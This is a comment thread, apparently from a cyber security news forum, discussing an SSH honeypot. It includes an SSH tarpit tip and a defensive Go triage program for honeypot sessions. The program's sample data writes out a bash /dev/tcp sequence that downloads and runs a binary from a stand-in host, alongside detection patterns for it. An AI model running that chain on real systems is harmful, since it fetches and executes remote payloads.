this post was submitted on 26 Apr 2026
15 points (100.0% liked)

Pulse of Truth

2377 readers
46 users here now

Cyber Security news and links to cyber security stories that could make you go hmmm. The content is exactly as it is consumed through RSS feeds and won't be edited (except for the occasional encoding errors).

This community is automagically fed by an instance of Dittybopper.

founded 2 years ago

Comments

top 8 comments
[–] FrederikNJS@piefed.zip 5 points 2 hours ago

That's pretty interesting.

I have been running an SSH tarpit for several years. Basically it's a tiny Go executable that responds to SSH connections, and then proceeds to very very slowly respond with an endless banner. So clients wait endlessly for the login prompt. I have seen clients getting stuck and waiting for whole weeks.

Link for anyone who wants to run a tarpit themselves: https://github.com/skeeto/endlessh

[–] corsicanguppy@lemmy.ca 2 points 2 hours ago* (last edited 2 hours ago)
[–] blueworld@piefed.world 8 points 3 hours ago

What I Learned

  1. The internet is loud

Your server isn't special. Nobody is "targeting" it. Every IP address on the internet is being continuously probed by automated systems. Within seconds of exposing port 22, you will receive login attempts. This isn't a question of "if" but "when" — and the answer to "when" is "immediately."

  2. Most attackers are dumb

99.6% of the visitors never went beyond a single automated command. They're not hackers — they're scripts running on compromised machines, following instructions from a C2 server, executing the same uname command a million times a day across millions of IPs. The vast majority of internet "attacks" are just noise.

  3. The few smart ones are very smart

That French IP with the /dev/tcp/ trick, rotating C2 infrastructure, and UPX-packed binaries? That's professional-grade offensive tooling. The gap between the bottom 99% and the top 1% of attackers is enormous.

  4. Crypto is a magnet

The volume of attempts targeting Solana node credentials (solana/sol/validator/node) was surprising. Running crypto infrastructure on a publicly-accessible SSH port without key-based auth is actively being hunted.

  5. Some people are just curious

The explorer from Cameroon, the slow typer from Berlin, the person from Bangladesh poking around /var and creating text.txt — these aren't malicious actors. They're curious humans who found an open door and wanted to see what was on the other side. They didn't download malware or try to establish persistence. They just... looked around.

  6. Nobody reads the MOTD

The honeypot displays a full Ubuntu welcome message with system stats when you log in. Not a single interactive user appeared to notice or care that the system information was suspiciously static. First thing they do? ls.
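The split the list above draws, between single-command noise and the rare session worth an analyst's time, is the kind of thing a honeypot operator ends up scripting. Below is an added triage example, not code from the post or the honeypot it describes: it takes session records in a constructed format (source IP, commands in order, first bytes of any dropped file), counts how many sessions stop after one command (the number behind a figure like the 99.6% above), and flags two of the indicators the post mentions. The `/dev/tcp/` check looks for bash's built-in socket (`exec 3<>/dev/tcp/HOST/PORT`), which lets an attacker fetch a payload on a box with no curl or wget; the UPX check looks for the `UPX!` marker that the packer leaves in the file unless the attacker patches it out. The sample sessions use RFC 5737 documentation addresses and are constructed, not data from the post.

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
)

// Session is one honeypot login as a triage step would see it. The record
// layout is an assumption made for this example.
type Session struct {
	IP       string
	Commands []string // shell commands in the order they were typed
	Dropped  []byte   // first bytes of any file the client wrote, nil if none
}

// Verdict is the triage result for one session.
type Verdict struct {
	Automated  bool     // one command and then gone: scripted recon
	Indicators []string // things a human should look at
}

var (
	// bash's built-in TCP client. `exec 3<>/dev/tcp/HOST/PORT` opens a socket
	// with no download tool on the box, so it stands out in a session log.
	devTCP = regexp.MustCompile(`/dev/tcp/[^/\s]+/[0-9]+`)
	// Marker UPX leaves in a packed ELF. A heuristic only: it is trivially
	// stripped, so absence proves nothing.
	upxMagic = []byte("UPX!")
)

// Triage classifies a session as scripted noise or collects indicators.
func Triage(s Session) Verdict {
	var v Verdict
	if len(s.Commands) <= 1 {
		v.Automated = true
		return v
	}
	for _, c := range s.Commands {
		if devTCP.MatchString(c) {
			v.Indicators = append(v.Indicators, "bash /dev/tcp socket: "+c)
		}
	}
	if bytes.Contains(s.Dropped, upxMagic) {
		v.Indicators = append(v.Indicators, "dropped binary is UPX-packed")
	}
	return v
}

// Summarize returns how many sessions were single-command noise and that
// count as a percentage of all sessions.
func Summarize(sessions []Session) (automated int, pct float64) {
	for _, s := range sessions {
		if Triage(s).Automated {
			automated++
		}
	}
	if len(sessions) == 0 {
		return 0, 0
	}
	return automated, 100 * float64(automated) / float64(len(sessions))
}

// SampleSessions is constructed input for this example (RFC 5737 addresses),
// not data captured by the honeypot in the post.
func SampleSessions() []Session {
	return []Session{
		{IP: "203.0.113.5", Commands: []string{"uname -a"}},
		{IP: "203.0.113.6", Commands: []string{"uname -a"}},
		{IP: "198.51.100.7", Commands: []string{
			"cd /tmp",
			"exec 3<>/dev/tcp/192.0.2.10/4444",
			"cat <&3 > .x",
			"chmod +x .x",
			"./.x",
		}, Dropped: []byte("\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00UPX!")},
		{IP: "192.0.2.200", Commands: []string{"ls", "cd /var", "ls", "echo hi > text.txt"}},
	}
}

func main() {
	ss := SampleSessions()
	for _, s := range ss {
		v := Triage(s)
		fmt.Printf("%-14s automated=%-5v indicators=%q\n", s.IP, v.Automated, v.Indicators)
	}
	n, pct := Summarize(ss)
	fmt.Printf("%d/%d sessions (%.1f%%) were single-command noise\n", n, len(ss), pct)
}
```

The point of the split is prioritisation: the curious visitor who only runs `ls` and writes a text file yields no indicators and can be skipped, while the session that opens a raw socket and drops a packed ELF is the one worth pulling the binary and the C2 address from.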

[–] AmbitiousProcess@piefed.social 1 points 2 hours ago

Very much worth a read!

That was an interesting read. Thank you.

[–] wizardbeard@lemmy.dbzer0.com 2 points 5 hours ago (1 children)

Hey, the comments link isn't actually a link, whoever is running this bot.

[–] krogoth@infosec.pub 1 points 21 minutes ago

Oh wow 🙄. Thanks for letting me know.

[–] drkt@scribe.disroot.org 2 points 5 hours ago